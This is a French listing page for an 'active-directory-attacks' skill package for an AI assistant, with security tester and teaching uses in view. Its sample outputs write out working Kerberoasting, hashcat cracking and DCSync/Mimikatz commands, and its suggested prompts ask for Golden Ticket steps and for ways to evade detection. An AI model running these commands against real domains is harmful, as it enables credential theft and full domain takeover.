active-directory-attacks
Exécuter des tests d'intrusion Active Directory et des évaluations red team
Les équipes de sécurité ont besoin d'une documentation complète pour les évaluations Active Directory autorisées. Cette compétence fournit des techniques d'attaque documentées et des commandes d'outils pour les testeurs d'intrusion menant des opérations red team.
Télécharger le ZIP du skill
Importer dans Claude
Allez dans Paramètres → Capacités → Skills → Importer un skill
Activez et commencez à utiliser
Tester
Utilisation de "active-directory-attacks". Montrez-moi les commandes Kerberoasting pour le domaine example.local
Résultat attendu:
- Utilisation d'Impacket depuis Linux : GetUserSPNs.py example.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
- Utilisation de Rubeus depuis Windows : .\Rubeus.exe kerberoast /outfile:hashes.txt
- Crack avec hashcat : hashcat -m 13100 hashes.txt rockyou.txt
Utilisation de "active-directory-attacks". Comment effectuer une attaque DCSync ?
Résultat attendu:
- DCSync nécessite les droits Replicating Directory Changes. Utilisation d'Impacket : secretsdump.py example.local/admin:password@10.10.10.10 -just-dc
- Utilisation de Mimikatz : lsadump::dcsync /domain:example.local /user:krbtgt
- Ceci extrait tous les hashs de mot de passe du domaine incluant krbtgt pour la création de Golden Ticket
Audit de sécurité
Risque faibleThis skill contains documentation and reference material for Active Directory penetration testing techniques. Static analysis flagged 200+ patterns (PowerShell commands, tool references, IP addresses) but all are FALSE POSITIVES - the files are markdown documentation, not executable code. Content describes legitimate security tools (BloodHound, Impacket, Mimikatz) used by penetration testers. Risk is LOW because: (1) files are read-only reference material, (2) no code execution occurs, (3) content is educational for authorized security testing. Recommend adding disclaimer about authorized use only.
Problèmes à risque élevé (2)
Problèmes à risque moyen (2)
Problèmes à risque faible (2)
Facteurs de risque
⚙️ Commandes externes (4)
🌐 Accès réseau (4)
📁 Accès au système de fichiers (2)
Motifs détectés
Score de qualité
Ce que vous pouvez construire
Planification d'Évaluation Red Team
Les consultants en sécurité préparant des évaluations AD autorisées utilisent cette compétence pour planifier les chemins d'attaque et sélectionner les outils appropriés pour le périmètre d'engagement.
Recherche Défensive Blue Team
Les équipes de sécurité défensive étudient les techniques d'attaque pour comprendre les TTP des adversaires et améliorer les règles de détection pour leurs plateformes SIEM et EDR.
Formation et Éducation en Sécurité
Les instructeurs utilisent les techniques documentées pour enseigner aux étudiants les vulnérabilités AD et les stratégies de remédiation appropriées dans des environnements de laboratoire contrôlés.
Essayez ces prompts
Je dois effectuer une reconnaissance Active Directory autorisée. Quelles commandes BloodHound devrais-je utiliser pour énumérer les utilisateurs, groupes et ordinateurs du domaine ? Le domaine cible est example.local avec les identifiants user:password.
Montrez-moi comment effectuer Kerberoasting contre un domaine Active Directory. Incluez les commandes pour extraire les tickets TGS avec Impacket et les cracker avec hashcat.
J'ai compromis un utilisateur domaine à faibles privilèges. Quelles sont les techniques de mouvement latéral recommandées pour escalader les privilèges ? Comparez pass-the-hash, overpass-the-hash et les attaques par délégation.
Expliquez comment atteindre la domination de domaine en utilisant les attaques DCSync et Golden Ticket. Incluez les prérequis, commandes et considérations d'évitement de détection pour chaque technique.
Bonnes pratiques
- Toujours obtenir une autorisation écrite avant d'exécuter toute technique d'attaque AD contre des environnements de production
- Documenter tous les comptes compromis et systèmes accédés pour le rapport client et les conseils de remédiation
- Synchroniser l'heure avec le contrôleur de domaine avant les attaques Kerberos pour éviter les échecs de décalage d'horloge
- Utiliser des techniques furtives comme les limites d'énumération d'utilisateurs pour éviter les verrouillages de comptes durant le password spraying
- Restaurer tout état système modifié (comme les changements de mot de passe ZeroLogon) après la fin des tests
Éviter
- Ne jamais exécuter de commandes d'attaque contre des environnements sans autorisation écrite explicite du propriétaire
- Ne pas exécuter de password spraying agressif qui pourrait verrouiller les comptes d'utilisateurs légitimes
- Éviter de laisser des Golden Tickets ou autres mécanismes de persistance sans les documenter pour suppression
- Ne pas modifier les objets Active Directory de production, GPO ou configurations sans approbation
Foire aux questions
Cette compétence est-elle légale à utiliser ?
De quels outils ai-je besoin pour exécuter ces attaques ?
Cette compétence peut-elle exécuter automatiquement des attaques ?
Quelle est la différence entre Kerberoasting et AS-REP Roasting ?
Comment détecter ces attaques dans mon environnement ?
Qu'est-ce qu'un Golden Ticket et pourquoi est-il dangereux ?
Détails du développeur
Auteur
sickn33Licence
MIT
Dépôt
https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/active-directory-attacksRéf
main
Structure de fichiers